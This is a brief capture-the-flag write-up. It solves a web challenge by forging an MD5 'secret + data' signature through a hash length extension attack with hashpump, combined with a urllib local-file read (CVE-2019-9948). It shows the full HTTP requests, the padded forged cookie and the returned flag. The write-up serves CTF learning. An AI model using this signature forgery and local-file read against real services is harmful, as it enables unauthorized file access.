Rating:
Hash Length Extension Attacks+CVE-2019-9948(urllib)
code define two methods,scan and read. both methods use md5(secert_key + param + action) encoding. and /genesign provide sign of scan method.
scan method sign value.GET /geneSign?param=local-file:flag.txt HTTP/1.1
Host: 139.180.128.86
HTTP/1.1 200 OK
Server: nginx/1.15.8
Content-Length: 32
Connection: close
51796b52dd6e1108c89b7d5277d3ae0a
hashpump generate new sign value that contain scan and read methods.$ hashpump
Input Signature: 51796b52dd6e1108c89b7d5277d3ae0a
Input Data: local-file:flag.txtscan
Input Key Length: 16
Input Data to Add: read
eafd6ccd634ec29886babc843f1d8b86
local-file:flag.txtscan\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008\x01\x00\x00\x00\x00\x00\x00read
\x into % in new param,and sumit them.GET /De1ta?param=local-file:flag.txt HTTP/1.1
Host: 139.180.128.86
Cookie:action=scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%008%01%00%00%00%00%00%00read;sign=eafd6ccd634ec29886babc843f1d8b86
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.15.8
Content-Type: text/html; charset=utf-8
Content-Length: 65
Connection: close
{"code": 200, "data": "de1ctf{27782fcffbb7d00309a93bc49b74ca26}"}
Due to my Careless,Sorry about the unexpected solution of this challenge.Hope you have a great time in the game.
